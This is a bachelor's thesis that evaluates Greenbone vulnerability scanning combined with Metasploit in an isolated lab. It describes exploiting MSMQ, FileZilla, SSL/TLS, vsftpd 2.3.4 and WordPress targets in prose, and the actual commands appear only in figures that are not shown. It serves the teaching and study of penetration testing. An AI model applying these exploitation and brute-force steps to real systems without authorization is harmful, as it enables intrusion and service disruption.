Bachelor’s Thesis

Information and Communications Technology

2024

Khiem Bui

Combining Greenbone and

Metasploit for Enhanced
Penetration Testing: A Lab-Based
Evaluation
Bachelor’s Thesis | Abstract

Turku University of Applied Sciences

Information and Communications Technology

2024 | 52 pages

Khiem Bui

Combining Greenbone and Metasploit for Enhanced

Penetration Testing: A Lab-Based Evaluation

Penetration testing is a crucial component of any cybersecurity strategy, enabling

organizations to identify vulnerabilities in their systems before attackers can
exploit them. This thesis has two primary objectives:

To explore the combined use of Greenbone Vulnerability Management (GVM)

and the Metasploit Framework (MF) in assessing the security of a target system.
To evaluate the effectiveness of integrating these two popular vulnerabilities
scanning and penetration testing tools within a controlled lab environment.

By combining the vulnerability assessment capabilities of GVM with the

exploitation tools provided by Metasploit, the thesis demonstrates an approach
to penetration testing that can help organizations strengthen their overall security
posture and better protect their critical assets from potential cyber threats.

Keywords:

Penetration Testing, Pentest, Metasploit, Vulnerability Management,

Vulnerability Assessment.
Contents

List of abbreviations 6

1 Introduction 7

2 Penetration Testing Concept and Security Standards 10

2.1 Introduction to Penetration Testing 10
2.2 Penetration Testing Methodologies 11
2.3 Introduction Vulnerability Management 12
2.4 Overview of the Greenbone 12
2.5 Overview of the Metasploit Framework 12

3 Methodology 13
3.1 Research Design 13
3.2 Data Collection 13
3.3 Setup and Configuration Greenbone and Metasploit Framework 13
3.4 Penetration Testing Process 23

4 System Test 27
4.1 Network Diagram 27
4.2 IP Address and Services 28

5 Test Scenario 29
5.1 CVE-2023-21554 - Microsoft Message Queuing Remote Code Execution
Vulnerability. 29
5.2 CVE-2005-3589 - FileZilla FTP Server Admin Interface Denial of Service
(DoS) 31
5.3 CVE-2011-3389 - Exploit for SSL/TLS Version Detection 33
5.4 CVE-2011-2523 - vsftpd 2.3.4 35
5.5 WordPress User Enumeration 38

6 Conclusion 48
Tool Enhancement 48
Expanding the Scope 48
Training and Continuous Improvement 48

References 50

Figures

Figure 1. Download file GSM ONE Virtual Appliance.

Figure 2. Import Greenbone Vulnerability Management Appliance to VMware.
Figure 3. Welcome to Greenbone Vulnerability Management.
Figure 4. Setup Wizard with new machine.
Figure 5. Create a new account access to the global web admin.
Figure 6. New admin login global web page.
Figure 7. Configure the settings of your Greenbone Enterprise Appliance.
Figure 8. Configure with IPv4 is dynamic.
Figure 9. The Dashboard of GVM.
Figure 10. Self-check the database on GVM before scanning.
Figure 11. Login to the system with user credential and running MF.
Figure 12. The task scan 4 virtual machines including Windows 10, 2022, Kali
Linux and Ubuntu.
Figure 13. Report based on the vulnerability.
Figure 14. Prioritize based on CVSS and Severity.
Figure 15. Over 196,000 vulnerability tests (CVE).
Figure 16. The payload from Metasploit will be used.
Figure 17. Network diagram physical topology.
Figure 18. The payload to attack CVE 2023-21554.
Figure 19. MSMQ is patched.
Figure 20. Eventlog from client Windows 10.
Figure 21. Use payload Filezilla to exploit.
Figure 22. Configuration of the value such as remote host, and port used.
Figure 23. The message from the Filezilla Server dashboard.
Figure 24. Use payload auxiliary to scan SSL.
Figure 25. SSL version support.
Figure 26. The result after attack.
Figure 27. Scan with Nmap to find out the detail of vsftpd2.3.4.
Figure 28. Banner the vsftp and message.
Figure 29. User anonymous can login the system.
Figure 30. Webpage is running apache.
Figure 31. The information from Nikto scan.
Figure 32. WordPress scanner information.
Figure 33. Detected WordPress 6.5.3.
Figure 34. WordPress login enumeration.
Figure 35. Choose the username and password file.
Figure 36. WordPress brute force is successful.
Figure 37. Unable to login with a username and password from the MF machine
to Ubuntu’s machine.
Figure 38. Login to the admin portal with the username ”demo” and password
”123”.

Tables

Table 1. IP addressing of the lab environment.

List of abbreviations

BCBA Blockwise Chosen-Boundary Attack

CVE Common Vulnerabilities and Exposures

CVSS Common Vulnerability Scoring System

GVM Greenbone Vulnerability Management

HTTP Hypertext Transfer Protocol

HTTPS Hypertext Transfer Protocol Secure

ISECOM Institute for Security and Open Methodologies

MF Metasploit Framework

MSMQ Microsoft Message Queuing

NIST National Institute of Standards and Technology

SSL Secure Sockets Layer

Pentest Penetration Testing

VM Vulnerability Management

OSSTMM Open Source Security Testing Methodology Manual

OWASP Open Web Application Security Project

 7

1 Introduction

Nowadays, technology is always changing, and cybersecurity is constantly

evolving to address the growing threats posed by malware, artificial intelligence,
and machine learning. (Prnewrise 2024; Splashtop 2024) Penetration testing
(pentest) is a method to ensure the system is secure and does not have a
vulnerability or misconfiguration, is up to date, and follows security regularly. This
is the best approach for identifying a system’s vulnerabilities and weaknesses
that could be exploited by attackers. (Hackerone, n.d). In this context, the
Greenbone Vulnerability Management (GVM) and the Metasploit Framework
(MF) have emerged as powerful tools for conducting pentest and managing
vulnerabilities.

Studying data networks and security raises awareness of the importance of

protecting data in enterprises. Organizations must have a plan to manage
security in hybrid environments involving on-premises and cloud systems such
as private and public clouds in the transformation trend. In addition, as
cybersecurity is becoming more sophisticated and prevalent, organizations must
proactively identify and remediate vulnerabilities to safeguard their sensitive data
and systems. (Threatintelligence, 2023). However, many companies are still not
fully aware of the importance of security measures. Therefore, combining the
GVM and the MF tools can help them protect their systems more effectively, save
money and reduce costs associated with security breaches and operational
disruptions. The objectives of this thesis are to co-ordinate security testing tools
and to contribute to the advancement of organizations' effective pentest
methodologies. This includes payloads for exploitation, as well as risk-level
assessments and developing robust security tactics.

The thesis will focus on the following content areas: the features of the GVM and
the MF, the potential benefits of their combination, the implementation and
configuration, security best practices, and case studies of the conjunction use of
these systems. In addition, it will help to identify and assess the vulnerabilities

Turku University of Applied Sciences Thesis | Khiem Bui

 8

present in the lab environment so that appropriate actions can be taken for real
systems.

The hypothesis of this thesis is that combining GVM and MF will increase the
success rate of exploitation attempts and improve the pentest's overall efficiency.

Other systems that are deployed, include Microsoft Windows Server 2022
Standard, Microsoft Windows 10 Client, Ubuntu—20.04.6 Desktop, and installed
services that have a vulnerability, such as FileZilla Server, Microsoft Message
Queuing (MSMQ), and Web services, are emulation clients in real scenarios.

The thesis is structured as follows:

• Chapter 1 introduces the topic, including the thesis objectives, justification

for the research, and the resources for the lab environment.
• Chapter 2 presents a comprehensive review of the pentest concept and
security standards, the GVM and the MF, highlighting their capabilities and
features.
• Chapter 3 explores the methodology including research design, data
collection, and challenges of integrating these tools, along with practical
implementation considerations.
• Chapter 4 presents the test system for this thesis.
• Chapter 5 presents case studies illustrating the combined use of the GVM
and the MF.
• Chapter 6 analyzes the results, draws conclusions, and proposes
recommendations for future research and practical application of the
integrated pentest approach.

The proof of concept conducted in the lab environment aims to demonstrate the
feasibility of coordinating the use of these powerful tools. The aim of this thesis
is to contribute to the advancement of organizations' effective pentest
methodologies. It includes utilizing payloads for exploitation, as well as

Turku University of Applied Sciences Thesis | Khiem Bui

 9

assessment through risk level analysis and the development of security strategies
of organization.

Turku University of Applied Sciences Thesis | Khiem Bui

 10

2 Penetration Testing Concept and Security Standards

This chapter covers basic knowledge, understanding of pentest and vulnerability

management definitions, different security standards using pentest implemented,
and an overview of the GVM and MF. The study in this section will provide
sufficient knowledge in the theoretical part and better guidance for the practical
part of the system test.

2.1 Introduction to Penetration Testing

Penetration testing is an authorized simulated attack method and technique used

to exploit a system, network, database, and web application with the purpose
performed to evaluate the security of the system. Depending on the scope of the
project and the purpose, we have three types of pentest that are black box, white
box, and gray box.

2.1.1 Black box

“In this technique, the testers did not have any insights into the code, architecture,
or system design". They enter the scenario as unauthorized, and external users.
(Imperva, n.d). We can use this technique for brute force attacks, password
cracking, fuzzing, vulnerability scanning, and performance testing. The attackers
can combine multiple techniques and tools to help them find the gap and
misconfiguration in the system.

2.1.2 White box

The testers are ethical hackers and “have full knowledge of the system design,
network architecture, and services inside the network”. The white box allows the
pentester to identify risk and security weaknesses that may not be apparent with
other testing methods such as the black box, and gray box, which helps improve

Turku University of Applied Sciences Thesis | Khiem Bui

 11

the organization's security. (Bluegoatcyber, n.d). Moreover, it helps ensure

compliance with security standards such as the International Organization for
Standardization, and the National Institute of Standards and Technology (NIST).

2.1.3 Gray box

“The testers may have limited or partial knowledge of the target of their attacks”.
This is a method to use for debugging the software or for the evaluation of a
vulnerability. (Tidmarsh, 2023). A gray box pentest is a combination of black box
and white box methodologies.

2.2 Penetration Testing Methodologies

Pentest is a security test that can be performed manually or using automatic tools
and that follows the pentest methodology. (IBM, n.d). The scope and
methodology depend on the organization. In this thesis, we will focus on the top
3 methodologies and standards frequently used in the organizations. (Barahona,
2022)

2.2.1 OSSTMM (Open Source Security Testing Methodology Manual)

The Open Source Security Testing Methodology Manual (OSSTMM) is a peer-

reviewed methodology for performing pentest, security testing, and analysis.
Created by the Institute for Security and Open Methodologies (ISECOM), the
OSSTMM focuses on testing the operational security of systems and applications
from an attacker's perspective. (Herzog, n.d)

2.2.2 OWASP (Open Web Application Security Project)

The Open Web Application Security Project (OWASP) is an open-source

organization focused on improving web application security. OWASP maintains

Turku University of Applied Sciences Thesis | Khiem Bui

 12

a comprehensive Testing Guide that outlines a methodology for testing the

security of web applications. (OWASP, n.d)

2.2.3 NIST (National Institute of Standards and Technology)

The National Institute of Standards and Technology (NIST) is a government

agency that promotes standards in many areas including computer security. NIST
Special Publication 800-115 was written to provide technical guidelines for
conducting pentest, vulnerability analysis, and mitigation strategies. (Scarfone el
al. 2008)

2.3 Introduction Vulnerability Management

Vulnerability Management (VM) is a process that involves scanning a company's

network infrastructure to identify potential security weaknesses or vulnerabilities.
The goal of vulnerability management is to identify security weaknesses in the
network infrastructure and minimize damage if one does occur. (Wikipedia, n.d)

2.4 Overview of the Greenbone

The Greenbone Vulnerability Management (GVM) is a network vulnerability

scanning framework that was initially created as a community initiative called
OpenVAS. It is primarily designed and maintained by Greenbone Networks.
(Greenbone, n.d)

2.5 Overview of the Metasploit Framework

Metasploit Framework (MF) is Ruby-based, and it contains a suite of tools used

to test security vulnerabilities, enumerate networks, execute attacks, and evade
detection. At its core, the Metasploit Framework is a collection of commonly used
tools that provide a complete environment for manual pentest and exploit
development. (Rapid7, n.d).

Turku University of Applied Sciences Thesis | Khiem Bui

 13

3 Methodology

3.1 Research Design

Because of the nature of VM and pentest research, the most appropriate research
design is an experimental design in a lab environment. It allows researchers to
manipulate variables, control conditions, measure the impact of specific
interventions or approaches, and choose templates. By employing an
experimental design, researchers can systematically compare different pentest
techniques, tools, security standards, or methodologies to determine their relative
effectiveness in identifying vulnerabilities, exploiting the system to validate the
level of vulnerability, and improving overall system security.

3.2 Data Collection

The lab environment is based on the local system based on the VMware system
and does not have access from the internet. The types of data that will be
collected include network traffic, system logs, and vulnerability scans.

3.3 Setup and Configuration Greenbone and Metasploit Framework

3.3.1 Setup Greenbone

Installing a virtual appliance starts with importing the earlier downloaded virtual
appliance software. These downloaded files can be seen in (Figure 1) below.

Turku University of Applied Sciences Thesis | Khiem Bui

 14

Figure 1. Download file GSM ONE Virtual Appliance.

The following steps (Figure 2) can be used to install a virtual appliance on the lab
environment hypervisor host. The user should open VMware Workstation, select
'File,' and then choose 'Open.' Next, the user should navigate to and select the
file named GSM-ONE.

Figure 2. Import Greenbone Vulnerability Management Appliance to VMware.

Turku University of Applied Sciences Thesis | Khiem Bui

 15

The next step (Figure 3) provides the name and local storage of the virtual
machine on the lab and click import waiting for completion. After import of the
GSM-ONE file is completed, the user should start the virtual machine.

Figure 3. Welcome to Greenbone Vulnerability Management.

Following the steps (Figure 4) to configuration user login on the GVM. The user
selects the setup wizard to configure the full function with a new machine.

Turku University of Applied Sciences Thesis | Khiem Bui

 16

Figure 4. Setup Wizard with new machine.

By default, the account “admin” is the first account to have permission to setup,
install license, backup, and upgrade the device. We need to create a new user
login (Figure 5) for the global web admin to do the task through network
environments.

Turku University of Applied Sciences Thesis | Khiem Bui

 17

Figure 5. Create a new account access to the global web admin.

The user can choose a new account to access the webpage. In the security best
practice, this username should have a different role than the admin account used
in the console. But this is a lab environment so we can choose the same
username and password. Here (Figure 6) the user admin credentials are
prompted for creation.

Turku University of Applied Sciences Thesis | Khiem Bui

 18

Figure 6. New admin login global web page.

The next few shots show the configuration IP address. The user selects ‘Setup’
(Figure 7) and then chooses Network to configure the network settings, and
Interfaces to configure the network interface.

Turku University of Applied Sciences Thesis | Khiem Bui

 19

Figure 7. Configure the settings of your Greenbone Enterprise Appliance.

In this lab environment, we will use the IP address from the Dynamic Host
Configuration Protocol (Figure 8), and ensure it is in the same network class as
other machines.

Turku University of Applied Sciences Thesis | Khiem Bui

 20

Figure 8. Configure with IPv4 is dynamic.

The GVM can be launched by logging into the appliance’s IP address for the first
time with the web browser.

The user starts with the GVM virtual appliance configuration with the web browser
(Figure 9) address https://192.168.112.140 is typed into the address field. The
default credentials used to log in are a username and password of “admin”.

Turku University of Applied Sciences Thesis | Khiem Bui

 21

Figure 9. The Dashboard of GVM.

Before the GVM appliance can communicate with another system in the local
area network the configuration (Figure 10) needs to be finalized. Additionally, the
database from Greenbone Networks needs to be updated to make sure the
database is the newest.

Turku University of Applied Sciences Thesis | Khiem Bui

 22

Figure 10. Self-check the database on GVM before scanning.

3.3.2 Setup Metasploit Framework

The user installing a Metasploit Framework starts with unzipping those earlier
downloaded virtual appliance software. The user login to the Kali Linux machine
(Figure 11) with username and password “kali” to ensure Metasploit Framework
is running.

Turku University of Applied Sciences Thesis | Khiem Bui

 23

Figure 11. Login to the system with user credential and running MF.

3.4 Penetration Testing Process

Here is an overview of the penetration testing process using Greenbone

Vulnerability Management (GVM) and the Metasploit Framework (MF). There are
four pentest phases: information collection, identify and analysis of the
vulnerability, exploit or attack to verify the vulnerability, report and remediation.
We will provide more details below.

3.4.1 Information collection

The user used GVM to perform network scanning and gather information about
the target system (Figure 12), such as open ports, services running, version in
use, operating system, banner information, and potential vulnerability. We
scanned four targets including Windows Server 2022 Standard, Kali Linux,
Windows 10 Client, and Ubuntu 20.04.6. Therefore, the result did not include
GVM.

Turku University of Applied Sciences Thesis | Khiem Bui

 24

Figure 12. The task scan 4 virtual machines including Windows 10, 2022, Kali
Linux and Ubuntu.

3.4.2 Identify and analysis the Vulnerability

The user selected the “Scans” menu and clicked “Tasks” to ensure all tasks were
done before going to “Vulnerabilities”. This step aims to find out the vulnerability
of all machines. Next, the user analyzes the results of GVM (Figure 13) to identify
potential attack vectors and find the module support for the pentest.

Figure 13. Report based on the vulnerability

In this report, we can see all medium severity vulnerabilities on three machines
including a Windows 10 Client, a Windows Server, and an Ubuntu device.

Turku University of Applied Sciences Thesis | Khiem Bui

 25

Prioritize vulnerabilities (Figure 14) based on factors like exploitability, impact,

Common Vulnerabilities and Exposures (CVE), Common Vulnerability Scoring
System (CVSS) Scores, and risk level. (Balbix, n.d). The user can see details of
the report per host including vulnerability, port opening, name of the application
running, and version used. The user searches for a list of exploits in Metasploit,
which includes vulnerabilities that can be used for pentest with Metasploit. There
is a list of vulnerabilities we can exploit in this lab environment.

• DCE/RPC and MSRPC Services Enumeration Reporting.

• FTP with filezilla_server:0.9.39 DDoS.
• SSL/TLS Deprecated TLSv1.0 and TLSv1.1 Protocol Detection.
• Anonymous FTP Login with vsftpd:2.3.4.
• Brute force attack with WordPress:6.5.3.

Figure 14. Prioritize based on CVSS and Severity

Over 196,000 vulnerability tests (Figure 15) help us determine the best approach
to exploiting vulnerabilities in the lab environment.

Turku University of Applied Sciences Thesis | Khiem Bui

 26

Figure 15. Over 196,000 vulnerability tests (CVE)

3.4.3 Exploit or attack to verify the vulnerability

The user selected the Metasploit Framework payload and shell code (Figure 16)
to launch exploits against the identified vulnerabilities.

Figure 16. The payload from Metasploit will be used.

3.4.4 Report and Remediation

Document the pentest process, including the tool in use, the person in charge,
the scope of the pentest, the number of vulnerabilities, the exploit used, and
evidence.

Turku University of Applied Sciences Thesis | Khiem Bui

 27

4 System Test

Five different systems were tested during the test period. The systems included
Microsoft Windows Server 2022 Standard running Services, Microsoft Windows
10 as a client, Ubuntu - 20.04.6 running web services, Kali Linux with Metasploit
installed and used for attacks, and Greenbone GSM ONE 22.04.2 used for
scanning vulnerabilities.

4.1 Network Diagram

The following section describes the network as implemented for the thesis while
the physical topology implemented is shown in Figure 17.

Figure 17. Network diagram physical topology.

Five machines were interconnected over a private network (LAN) setup for this
thesis using a TP-Link router wireless connection. The test machines have a
default networking configuration, which supports dynamic IP assignments to
virtual machines.

Turku University of Applied Sciences Thesis | Khiem Bui

 28

4.2 IP Address and Services

The entire infrastructure is setup to be built on the class ‘C’ private network block
of address, 192.168.112.0/24.

Table 1. IP addressing of the lab environment.

Computer Name IP Address Function / Services

Greenbone ONE 192.168.112.140 Vulnerability Scan

Kali Linux 192.168.112.136 Metasploit, Nmap.
Windows 10 Client 192.168.112.137 MSMQ, FileZilla server
0.9.39.
Windows Server 192.168.112.138 IIS, Remote Desktop
2022 Standard
Ubuntu 20.04.6 192.168.112.141 VSFTPD v2.3.4,
WordPress

Turku University of Applied Sciences Thesis | Khiem Bui

 29

5 Test Scenario

The thesis will provide detailed information and insights about the benefits of
pentest in the lab environment. Five examples have been chosen for the case
studies. These are five vulnerabilities at a medium level, identified after a scan of
the system using the GVM (Greenbone Vulnerability Manager) tool. Even though
it is medium level some cases can impact the system and crash.

5.1 CVE-2023-21554 - Microsoft Message Queuing Remote Code Execution

Vulnerability.

Unauthorized RCE Vulnerability in Microsoft Message Queuing (MSMQ) Service

CVE-2023-21554 aka QueueJumper is a critical unauthorized remote code
execution (RCE) vulnerability with a CVSS score of 9.8. Attack complexity is low,
and it does not require any privileges such as administrator or user interaction.
To exploit this vulnerability, threat actors would send a malicious MSMQ packet
to a listening MSMQ service on the client. (Bitdefender, 2023) (Quorumcyber,
n.d).

The user checks the result from GVM and finds the exploit command from MF.
Next, the user sets the remote host vulnerability (Figure 18), the port number
used to exploit.

Turku University of Applied Sciences Thesis | Khiem Bui

 30

Figure 18. The payload to attack CVE 2023-21554

Finally, let us review the options again to make sure we have set them all
appropriately. The user enters the ‘show options’ commands (Figure 19), as
shown here, and runs the command to exploit.

Figure 19. MSMQ is patched

After the exploit, ensure that the payload is executed on the victim machine
(windows 10 client). In this output (Figure 20), we can see the details from the
Event Viewer.

Turku University of Applied Sciences Thesis | Khiem Bui

 31

Figure 20. Eventlog from client Windows 10

The conclusion of this security test is that the MSMQ vulnerability in the client
appears to be patched.

5.2 CVE-2005-3589 - FileZilla FTP Server Admin Interface Denial of Service

(DoS)

Buffer overflow in FileZilla Server Terminal 0.9.39 may allow remote attackers to
cause a denial of service (terminal crash) and user legal cannot access the
services via a long user ftp command. (NIST, n.d, b).

The user will exploit the Windows 10 Client in this lab environment at
192.168.112.37. The exploit's target (Figure 21) is stored in the RHOSTS
variable. The user sets that parameter, as shown here.

Turku University of Applied Sciences Thesis | Khiem Bui

 32

Figure 21. Use payload Filezilla to exploit

In this scenario, the victim is Windows 10 and has installed the Filezilla admin on
a local machine. With everything configured, we can launch (Figure 22) the attack
to get the payload into the target machines.

Figure 22. Configuration of the value such as remote host, and port used.

The payload execution was completed, and the user should go back to Windows
10 (Figure 23) running the Filezilla server.

Turku University of Applied Sciences Thesis | Khiem Bui

 33

Figure 23. The message from the Filezilla Server dashboard.

In conclusion, the system crashed, and the user was unable to access it.

5.3 CVE-2011-3389 - Exploit for SSL/TLS Version Detection

SSL (Secure Socket Layer) and TLS (Transport Layer Security) are cryptographic
protocols that aim at protecting data transmission via networks (such as the
Internet). SSL/TLS ensures communication security for connections between a
client (web browser) and a web server. The SSL protocol, as used in certain
configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla
Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC
mode with chained initialization vectors, which allows man-in-the-middle
attackers to obtain plaintext Hypertext Transfer Protocol (HTTP) headers via a
blockwise chosen-boundary attack (BCBA) on a Hypertext Transfer Protocol
Secure (HTTPS) session, in conjunction with JavaScript code that uses (1) the
HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight
WebClient API, aka a "BEAST" attack. (NIST, n.d, a) (Rapid7, 2022).

The user configures Metasploit to launch the attack (Figure 24) and selects the
auxiliary/scanner/ssl. Metasploit supports Tab autocomplete when typing module
and variable names.

Turku University of Applied Sciences Thesis | Khiem Bui

 34

Figure 24. Use payload auxiliary to scan SSL.

The user sets the remote host (Figure 25) Windows Server 2022 with IP
192.168.112.138 installed SSL.

Figure 25. SSL version support

The user runs an exploit command (Figure 26) to attack the vulnerability on
Windows Server 2022.

Turku University of Applied Sciences Thesis | Khiem Bui

 35

Figure 26. The result after attack.

As a result, it is demonstrated that transactions cannot be processed through this

port because a timeout occurred.

5.4 CVE-2011-2523 - vsftpd 2.3.4

Very Secure File Transfer Protocol Daemon (VSFTPD), is an FTP server for Unix-
like systems, including Linux. This is a vulnerability allowing users anonymous
login without password. (Exploit-DB, 2021) (Vigilance, 2011).

The user should double-check and scan with Nmap (Figure 27) from the MF
machine to make sure the Ubuntu machine has vsftpd installed.

Turku University of Applied Sciences Thesis | Khiem Bui

 36

Figure 27. Scan with Nmap to find out the detail of vsftpd2.3.4

Metasploit offers a search facility to identify any Metasploit modules with a

matching keyword. The user used the exploit with vsftpd2.3.4 (Figure 28) to set
the remote host and the remote port, then ran the exploit to create the backdoor
and keep the connection.

Turku University of Applied Sciences Thesis | Khiem Bui

 37

Figure 28. Banner the vsftp and message

The exploit was completed but no session was created. We can see details of the
message output from Metasploit ‘This server is configured for anonymous only
and the backdoor code cannot be reached’. The user should go back to the Kali
Linux machine (Figure 29) and use an anonymous user to log in to Ubuntu’s
machine with IP address 192.168.112.141.

Turku University of Applied Sciences Thesis | Khiem Bui

 38

Figure 29. User anonymous can login the system.

In conclusion, even though we did not create a backdoor, who can log in with an
anonymous user, and without a password login to the system.

5.5 WordPress User Enumeration

User enumeration is a process used by attackers to identify valid usernames and

passwords with a system to gain access to the unauthorized system.
(Hackertarget, 2019).

From the scanning report by GVM, we can see that the Ubuntu machine has web
service running. The user accesses the website (Figure 30) from the Kali
machine.

Turku University of Applied Sciences Thesis | Khiem Bui

 39

Figure 30. Webpage is running apache.

Next, the user uses the Nikto tool (Figure 31) to perform a scan of the website to
find the vulnerabilities.

Turku University of Applied Sciences Thesis | Khiem Bui

 40

Figure 31. The information from Nikto scan.

We can see that the Ubuntu machines have installed WordPress and have some
folders there such as ’wordpress’, ‘wp-admin’, and ‘wp-content’. In this test case,
we used Metasploit to pentest on the vulnerability identified in the scan to secure
the website before it goes public.

We use the payload WordPress Scanner module (Figure 32) that scans for
installed themes, installed plugins, installed WordPress versions, and more
information about the target WordPress.

Turku University of Applied Sciences Thesis | Khiem Bui

 41

Figure 32. WordPress scanner information.

The user setups the remote host as a WordPress website (Figure 33) with an IP
address 192.168.112.141.

Turku University of Applied Sciences Thesis | Khiem Bui

 42

Figure 33. Detected WordPress 6.5.3

Metasploit also has a WordPress login enumeration module (Figure 34) that not
only helps in user enumeration but also brute forces their password if the
password is simple and does not have multifactor authentication.

Turku University of Applied Sciences Thesis | Khiem Bui

 43

Figure 34. WordPress login enumeration.

Because we did not know how many users were in the system, confirming
usernames and passwords is a process that takes time on the target WordPress
site. For this scenario, we will use a username and password from the wordlist
“common.txt” from the existing system and rename two files as usernames and
passwords (Figure 35) as shown below.

Turku University of Applied Sciences Thesis | Khiem Bui

 44

Figure 35. Choose the username and password file.

The password has been found in the Metasploit console (Figure 36) with
username ‘demo’ and password ‘123’.

Turku University of Applied Sciences Thesis | Khiem Bui

 45

Figure 36. WordPress brute force is successful.

In this case, we found the username and password, but could not login to the
website (Figure 37) from the MF machine because WordPress was installed on
the Ubuntu machine using localhost with IP address 127.0.0.1.

Turku University of Applied Sciences Thesis | Khiem Bui

 46

Figure 37. Unable to login with a username and password from the MF machine
to Ubuntu’s machine.

However, we can login directly to localhost (Figure 38) from the Ubuntu machine
with a username and password.

Figure 38. Login to the admin portal with a username ”demo” and password ”123”

Turku University of Applied Sciences Thesis | Khiem Bui

 47

The conclusion is that the attempt failed because the system did not allow remote
login.

Finally, five tests were performed to examine the lab environment’s security with
a medium severity level. The results showed that two attacks were successful,
and three failed.

Turku University of Applied Sciences Thesis | Khiem Bui

 48

6 Conclusion

The objectives of this thesis were to co-ordinate security testing tools and to
contribute to the advancement of organizations' effective pentest methodologies.
This includes payloads for exploitation, risk-level assessments, and developing
robust security tactics.

Tool Enhancement

Continued development and refinement of GVM and MF are essential to address

emerging threats. Future research should incorporate artificial intelligence,
automation, and machine learning to improve vulnerability detection, prevention,
and exploitation techniques. Besides, all tools should be updated to ensure we
have all the information about vulnerabilities and security payloads. Finally, we
should purchase a license to ensure compliance, receive support and updates
from the vendors.

Expanding the Scope

Future pentest initiatives should include newer technologies such as Internet of

Things (IoT) devices, and cloud environments such as private, public, and hybrid
cloud to ensure comprehensive security coverage. The technology should be
applied beyond laboratory settings to expand and adapt across different
industries and applications, rather than be limited to only controlled lab
environments.

Training and Continuous Improvement

Establishing advanced training programs for cybersecurity professionals to use

combined tools like GVM and MF proficiently will enhance the overall
effectiveness of pentest efforts. Furthermore, implementing a continuous

Turku University of Applied Sciences Thesis | Khiem Bui

 49

improvement process for pentest methodologies will help organizations be safe

and secure.

Turku University of Applied Sciences Thesis | Khiem Bui

 50

References

Balbix. (n.d). “What's the Difference Between CVE and CVSS?”. URL:
https://www.balbix.com/insights/whats-the-difference-between-cve-and-
cvss/#:~:text=Differences%20between%20CVSS%20and%20CVE,description
%2C%20dates%2C%20and%20comments. Accessed May 17, 2024.

Barahona, D. (2022). “Penetration Testing Best Practices for Every Stage of

Testing”. URL https://www.apisec.ai/blog/penetration-testing-best-practices
Accessed May 09, 2024.

Bitdefender. (April 2023). "Technical Advisory: Unauthorized RCE Vulnerability in

MSMQ Service CVE-2023-21554 aka QueueJumper". URL
https://www.bitdefender.com/blog/businessinsights/technical-advisory-
unauthorized-rce-vulnerability-in-msmq-service-cve-2023-21554-aka-
queuejumper/ Accessed May 24, 2024.

Bluegoatcyber. (n.d). "White Box Penetration Testing: A Comprehensive

Overview". URL https://bluegoatcyber.com/blog/white-box-penetration-testing-a-
comprehensive-overview/ Accessed May 02, 2024.

Exploit-DB. (2021). “Vsftpd 2.3.4 - Backdoor Command Execution”. URL

https://www.exploit-db.com/exploits/49757 Accessed May 11, 2024.

Greenbone. (n.d). "Greenbone OpenVAS". URL https://www.openvas.org/

Accessed April 10, 2024.

Hackerone. (n.d). "What Is Pentesting? How Does It Work Step-by-Step?" URL

https://www.hackerone.com/knowledge-center/what-penetration-testing-how-
does-it-work-step-step Accessed May 27, 2024.

Hackertarget. (October 2019). "WordPress User Enumeration". URL

https://hackertarget.com/wordpress-user-enumeration/ Accessed June 09, 2024.

Herzog, P. (n.d). "The Open Source Security Testing Methodology Manual". URL
https://www.isecom.org/OSSTMM.3.pdf Accessed May 2, 2024.

IBM. (n.d.). “Penetration testing methodologies and standards”. URL:

https://www.ibm.com/blog/pen-testing-methodology/ Accessed May 05, 2024.

Turku University of Applied Sciences Thesis | Khiem Bui

 51

Imperva. (n.d). "Black Box Testing". URL

https://www.imperva.com/learn/application-security/black-box-testing/ Accessed
May 03, 2004.

NIST. (n.d a). "CVE-2011-3389 Detail". URL https://nvd.nist.gov/vuln/detail/CVE-

2011-3389 Accessed May 21, 2024.

NIST. (n.d b ). "CVE-2005-3589 Detail". URL https://nvd.nist.gov/vuln/detail/CVE-

2005-3589 Accessed May 24, 2024.

OWASP. (n.d). "OWASP Application Security Verification Standard". URL

https://github.com/OWASP/ASVS/tree/v4.0.3#latest-stable-version---403
Accessed May 1, 2024.

Prnewrise. (March 2024). "Cyber Attacks Are More Sophisticated Than Ever,
With AI-Powered Attacks Posing the Greatest Risk". URL
https://www.prnewswire.com/news-releases/cyber-attacks-are-more-
sophisticated-than-ever-with-ai-powered-attacks-posing-the-greatest-risk-
302098797.html Accessed May 09, 2024.

Quorumcyber. (n.d). "Microsoft discloses critical RCE vulnerability – CVE-2023-

21554". URL https://www.quorumcyber.com/threat-intelligence/microsoft-
discloses-critical-rce-vulnerability-cve-2023-21554/ Accessed May 21, 2024.

Rapid7. (n.d). “Metasploit Framework”. URL:

https://docs.rapid7.com/metasploit/msf-overview/ Accessed April 18, 2024.

Rapid7. (August 2022). "SSL/TLS Version Detection". URL

https://www.rapid7.com/db/modules/auxiliary/scanner/ssl/ssl_version/ Accessed
May 21, 2024.

Scarfone, K., Souppaya, M., Cody, A., & Orebaugh, A. (September 2008).
"Technical Guide to Information Security Testing and Assessment". URL
https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-115.pdf
Accessed May 1, 2024.

Splashtop. (2024). “Top 10 Cyber Security Trends And Predictions For 2024”.
URL https://www.splashtop.com/blog/cybersecurity-trends-and-predictions-2024
Accessed May 10, 2024.

Turku University of Applied Sciences Thesis | Khiem Bui

 52

Threatintelligence. (November 2023). "Proactive Cybersecurity - What Is It, and

Why You Need It". URL https://www.threatintelligence.com/blog/proactive-
cybersecurity Accessed May 7, 2024.

Tidmarsh, D. (December 2023). "Black-Box, Gray Box, and White-Box

Penetration Testing: Importance and Uses". URL
https://www.eccouncil.org/cybersecurity-exchange/penetration-testing/black-
box-gray-box-and-white-box-penetration-testing-importance-and-uses/
Accessed May 27, 2024.

Vigilance. (July 2011). "Vulnerability of vsftpd: backdoor in version 2.3.4". URL

https://vigilance.fr/vulnerability/vsftpd-backdoor-in-version-2-3-4-10805
Accessed May 22, 2024.

Wikipedia. (n.d). "Vulnerability Management". URL

https://en.wikipedia.org/wiki/Vulnerability_management Accessed April 30, 2024.

Turku University of Applied Sciences Thesis | Khiem Bui